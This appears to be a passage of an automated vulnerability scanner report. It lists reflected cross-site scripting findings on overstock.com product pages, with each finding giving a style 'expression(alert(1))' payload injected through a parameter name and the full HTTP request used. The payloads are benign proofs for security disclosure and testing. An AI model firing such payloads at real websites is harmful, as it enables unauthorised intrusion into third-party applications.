This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Gifts-Flowers/Large-40-inch-Round-Padded-edge-Dog-Bed/2682544/product.html?f5879"style%3d"x%3aexpression(alert(1))"060fcf6f53d=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.112. http://www.overstock.com/Gifts-Flowers/Large-Memory-Foam-Dog-Bed-with-Microfiber-Cover/3053907/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c372"style%3d"x%3aexpression(alert(1))"e683909a5d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1c372"style="x:expression(alert(1))"e683909a5d6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Gifts-Flowers/Large-Memory-Foam-Dog-Bed-with-Microfiber-Cover/3053907/product.html?1c372"style%3d"x%3aexpression(alert(1))"e683909a5d6=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.113. http://www.overstock.com/Gifts-Flowers/PetGear-Auto-Carrier-and-Kennel/3320338/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ceb88"style%3d"x%3aexpression(alert(1))"e4019be7cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ceb88"style="x:expression(alert(1))"e4019be7cd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Gifts-Flowers/PetGear-Auto-Carrier-and-Kennel/3320338/product.html?ceb88"style%3d"x%3aexpression(alert(1))"e4019be7cd=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.114. http://www.overstock.com/Gifts-Flowers/Sweet-Selections-Gourmet-Gift-Basket/3452453/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e038a"style%3d"x%3aexpression(alert(1))"cd012eeeaa7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e038a"style="x:expression(alert(1))"cd012eeeaa7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Gifts-Flowers/Sweet-Selections-Gourmet-Gift-Basket/3452453/product.html?e038a"style%3d"x%3aexpression(alert(1))"cd012eeeaa7=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.115. http://www.overstock.com/Gifts-Flowers/Universal-Fit-Seat-Cover/1433549/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98463"style%3d"x%3aexpression(alert(1))"3f7e759d8e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 98463"style="x:expression(alert(1))"3f7e759d8e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Gifts-Flowers/Universal-Fit-Seat-Cover/1433549/product.html?98463"style%3d"x%3aexpression(alert(1))"3f7e759d8e0=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.116. http://www.overstock.com/Gifts-Flowers/Universal-Waterproof-Hammock-Back-Seat-Cover/3450019/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13ec0"style%3d"x%3aexpression(alert(1))"e89bccefc7f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 13ec0"style="x:expression(alert(1))"e89bccefc7f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Gifts-Flowers/Universal-Waterproof-Hammock-Back-Seat-Cover/3450019/product.html?13ec0"style%3d"x%3aexpression(alert(1))"e89bccefc7f=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.117. http://www.overstock.com/Gifts-Flowers/Zack-Zoey-Soft-Red-Dog-Sweatshirt/3906673/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7251a"style%3d"x%3aexpression(alert(1))"9cd48544d0e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7251a"style="x:expression(alert(1))"9cd48544d0e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Gifts-Flowers/Zack-Zoey-Soft-Red-Dog-Sweatshirt/3906673/product.html?7251a"style%3d"x%3aexpression(alert(1))"9cd48544d0e=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.118. http://www.overstock.com/Health-Beauty/Bare-Escentuals-Crown-Jewels-Makeup-Kit/3930811/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 742a2"style%3d"x%3aexpression(alert(1))"7ddfdf958c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 742a2"style="x:expression(alert(1))"7ddfdf958c9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Health-Beauty/Bare-Escentuals-Crown-Jewels-Makeup-Kit/3930811/product.html?742a2"style%3d"x%3aexpression(alert(1))"7ddfdf958c9=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.119. http://www.overstock.com/Health-Beauty/CHI-Air-Pro-Expert-Pink-Breast-Cancer-Awareness-1-inch-Flat-Iron-Combo-Pack/5075179/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8740e"style%3d"x%3aexpression(alert(1))"f06280582af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8740e"style="x:expression(alert(1))"f06280582af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Health-Beauty/CHI-Air-Pro-Expert-Pink-Breast-Cancer-Awareness-1-inch-Flat-Iron-Combo-Pack/5075179/product.html?8740e"style%3d"x%3aexpression(alert(1))"f06280582af=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.120. http://www.overstock.com/Health-Beauty/Curve-Vintage-Soul-by-Liz-Claiborne-Womens-3.4-ounce-Eau-de-Parfum-Spray/2869430/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c529d"style%3d"x%3aexpression(alert(1))"2dc1a013a42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c529d"style="x:expression(alert(1))"2dc1a013a42 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Health-Beauty/Curve-Vintage-Soul-by-Liz-Claiborne-Womens-3.4-ounce-Eau-de-Parfum-Spray/2869430/product.html?c529d"style%3d"x%3aexpression(alert(1))"2dc1a013a42=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.121. http://www.overstock.com/Health-Beauty/Farouk-CHI-1-inch-Beneath-Our-Earth-Styling-Iron-with-2-oz-Organic-Chi-Silk-Oil/4123486/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 705fb"style%3d"x%3aexpression(alert(1))"5454126871a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 705fb"style="x:expression(alert(1))"5454126871a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Health-Beauty/Farouk-CHI-1-inch-Beneath-Our-Earth-Styling-Iron-with-2-oz-Organic-Chi-Silk-Oil/4123486/product.html?705fb"style%3d"x%3aexpression(alert(1))"5454126871a=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.122. http://www.overstock.com/Health-Beauty/Farouk-CHI-Limited-Edition-Guitar-Purple-Hairstyling-Flat-Iron/4061543/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dd41"style%3d"x%3aexpression(alert(1))"45e65c86e48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2dd41"style="x:expression(alert(1))"45e65c86e48 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Health-Beauty/Farouk-CHI-Limited-Edition-Guitar-Purple-Hairstyling-Flat-Iron/4061543/product.html?2dd41"style%3d"x%3aexpression(alert(1))"45e65c86e48=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.123. http://www.overstock.com/Health-Beauty/Farouk-CHI-Limited-Edition-Red-Heart-1-inch-Flat-Iron/4565140/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf583"style%3d"x%3aexpression(alert(1))"e78249b5e41 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cf583"style="x:expression(alert(1))"e78249b5e41 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Health-Beauty/Farouk-CHI-Limited-Edition-Red-Heart-1-inch-Flat-Iron/4565140/product.html?cf583"style%3d"x%3aexpression(alert(1))"e78249b5e41=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.124. http://www.overstock.com/Health-Beauty/Farouk-CHI-Original-1-Inch-Ceramic-Ionic-Flat-Iron/1534477/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 911db"style%3d"x%3aexpression(alert(1))"d7e35dfcee6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 911db"style="x:expression(alert(1))"d7e35dfcee6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Health-Beauty/Farouk-CHI-Original-1-Inch-Ceramic-Ionic-Flat-Iron/1534477/product.html?911db"style%3d"x%3aexpression(alert(1))"d7e35dfcee6=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.125. http://www.overstock.com/Health-Beauty/Farouk-CHI-Shooting-Star-to-Earth-1-inch-Styling-Iron-with-Organic-CHI-Oil/4123482/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd8a1"style%3d"x%3aexpression(alert(1))"a3062c1c785 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bd8a1"style="x:expression(alert(1))"a3062c1c785 in the application's response.
